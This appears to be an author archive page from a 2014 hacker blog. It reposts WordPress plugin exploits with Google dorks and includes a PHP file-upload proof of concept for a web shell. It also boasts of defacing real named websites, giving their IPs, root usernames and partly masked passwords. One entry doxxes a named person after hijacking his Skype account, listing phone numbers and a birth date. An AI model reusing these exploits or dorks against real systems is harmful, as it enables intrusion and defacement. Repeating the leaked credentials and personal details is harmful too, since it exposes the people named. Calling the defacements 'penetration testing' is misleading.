1337mir

About 1337mir

So far 1337mir has created 49 entries.

WordPress Booking System SQL Injection vulnerable

May 27th, 2014

Exploit Title: WordPress Booking System (Booking Calendar) plugin SQL Injection
Release Date: 2014-05-21
Author: maodun
Contact: Twitter: @conmancm
Software Link: http://wordpress.org/support/plugin/booking-system
Affected version: < 1.3
Google Dork: inurl:/wp-content/plugins/booking-system/
REF: CVE-2014-3210

Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.

SQLi – Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerable parameter: $_POST['booking_form_id']
POC:
POST […]


server saturno.tropicalserver.net penetrate and security

May 11th, 2014

server saturno.tropicalserver.net penetrate and security tested by 1337mir

ip:188.165.93.13
host:saturno.tropicalserver.net
root user: info2com
root password: in*****(hidden for security reason)
login: http://188.165.93.13:2082/

defaced page link: http://zone-h.net/mirror/id/22343943

Notified all users to change their passwords and sent them vulnerability details via email.

cpanel username and password below:


O TV Lebanon penetrate and hacked

May 4th, 2014

O TV Lebanon penetrate and hacked By 1337MiR.
website address: http://www.otv.com.lb
ip: 65.254.41.214
date: 05-04-14

defaced page: http://www.otv.com.lb/1337mir.html
cache mirror: http://dark-h.org/deface/id/57336

contacted them, but didn't respond.


Kesserwen Al Asiya Newspaper website penetration testing

May 3rd, 2014

Kesserwen Al Asiya Newspaper website penetration testing by 1337mir.
website: http://kesserwen.org/
ip: 192.217.123.88
date: 05-03-2014 09:36AM
deface page: http://kesserwen.org/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22295807

contacted them, but didn't respond.


WordPress plugin EZPZ One Click Backup Command Injection

May 2nd, 2014

Product: WordPress plugin EZPZ One Click Backup
Vulnerability type: CWE-78 OS Command Injection
Vulnerable versions: 12.03.10 and some earlier versions
Google Dork: intext:plugins/ezpz-one-click-backup/
Credits: Henri Salo
Fixed version: N/A
Solution: Remove plugin
Vendor notification: Contact details N/A
WordPress plugins team notification: 2014-04-30
Risk: High
CVE: CVE-2014-3114

Vulnerability Details:

Contains a flaw that is triggered as input passed via the ‘cmd’ parameter in
ezpz-archive-cmd.php is not properly sanitized. With […]


Blue Cliff College website penetrate and security tested

May 1st, 2014

Blue Cliff College website penetrate and security tested by 1337mir.

website address: http://bluecliffcollege.edu/
ip: 216.92.176.122
defaced page: http://bluecliffcollege.edu/1337mir.html
zone-h mirror: zone-h.net/mirror/id/22285856
and 100+ more sites defaced: “zone-h.net/archive/notifier=1337MiR/” and “zone-h.net/archive/notifier=leetsec/published=0”

 


Scammer Michael Scheaffery’s skype account hacked

April 30th, 2014

Scammer Michael Scheaffery’s skype account hacked by 1337mir.

skype id: michael.scheaffery
skype password: fruit*****
first name: Michael
last name: Scheaffery
birth-date: 03-11-1958
Name aliases: Mechael, Michale, Michel, Mick, Mickey, Micky, Mihael, Mike, Miky
Age:58 (56)
Location(s): Virginia (US), Lagos (Nigeria); also claims to be in: London (UK)
Address(es):unknown
Phone number(s):+14192087257; 447035955183; 447700009793
E-mail address(es):[email protected]


scammer full info: http://www.male-scammers.com/the-scammers.asp?id=675


WordPress Themes Theagency File Upload Vulnerability

April 29th, 2014

Title : WordPress Themes Theagency File Upload Vulnerability
Author : AnonBoy
Google Dork : inurl:/wp-content/themes/theagency
Date : 21/04/2014
Facebook : https://www.facebook.com/nufailienafratsim.moechtar
Vendor : N/A
Tested on : Windows 7

POC:
<?php

$uploadfile = "x.php.jpg";
$ch = curl_init("http://localhost/wp-content/themes/theagency/includes/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access:
http://localhost/wp-content/themes/theagency/includes/uploadify/uploads/x.php.jpg
————————————————————————————–

Greeting:./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan
./Gantengers Crew
